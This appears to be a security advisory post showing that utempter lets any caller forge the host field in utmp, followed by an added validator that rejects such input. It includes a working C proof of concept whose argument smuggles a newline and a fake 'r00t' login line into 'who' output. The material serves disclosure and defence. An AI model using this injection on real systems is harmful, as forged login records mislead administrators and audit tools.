
utempter allows fake host setting

Quoting from 

  Utempter does not (cannot?) verify the setting of host, so it can easily
  be faked. This may affect any software that depends on utmp correctness.
  Demo of the issue:
  psz@bari:~$ cat silly.c
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <fcntl.h>
  #include <unistd.h>
  #include <stdio.h>
  #include <stdlib.h>   /* system() */
  int main()
  {
    int i;
    i = open("/dev/ptmx", O_RDWR);
    printf("open ptmx returned %d\n", i);
    /* the pty master becomes stdin, inherited by the utempter child */
    dup2(i, 0);
    /* dup2(i, 1); */
    printf("doing utempter add\n");
    /* host argument carries a newline followed by a made-up who-style line */
    system("/usr/lib/utempter/utempter add 'xyz)\nr00t     pts/0        Jan  1 01:02 (xyz.com'");
    printf("checking who\n");
    system("who | grep xyz");
    printf("doing utempter del\n");
    system("/usr/lib/utempter/utempter del");
    printf("checking who\n");
    system("who | grep xyz");
    return 0;
  }
  psz@bari:~$ cc silly.c; a.out
  open ptmx returned 3
  doing utempter add
  checking who
  psz      pts/29       Oct  4 11:48 (xyz)
  r00t     pts/0        Jan  1 01:02 (xyz.com)
  doing utempter del
  checking who
  Please see also:

Cheers, Paul

Paul Szabo   psz@xxxxxxxxxxxxxxxxx   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia
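
Added example, not part of the original post and not utempter's own code: one way a utmp-writing helper could reject the newline-forged host shown in the demo before storing it. The function name host_is_safe, the allowlist and the 256-byte field size are assumptions; the check stops forged lines only, the host value itself remains caller-chosen and unverified.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumption: ut_host is 256 bytes, as in glibc's struct utmp. */
#define HOST_FIELD_SIZE 256

/*
 * Hypothetical helper, not part of utempter: returns 1 if a caller-supplied
 * host string is safe to copy into ut_host, 0 otherwise.
 */
int host_is_safe(const char *host)
{
    size_t len, i;

    if (host == NULL)
        return 0;
    len = strlen(host);
    if (len == 0 || len >= HOST_FIELD_SIZE)
        return 0;   /* empty, or would not fit with its terminator */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        /* Allowlist: hostnames, IP literals, X displays such as ":0.0".
         * Newlines, spaces and parentheses are all rejected. */
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':' || c == '_'))
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed samples; the second is the host argument from the demo. */
    const char *samples[] = {
        "xyz.com",
        "xyz)\nr00t     pts/0        Jan  1 01:02 (xyz.com",
        ":0.0",
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%s: %s\n", host_is_safe(samples[i]) ? "accept" : "reject",
               samples[i]);
    return 0;
}
```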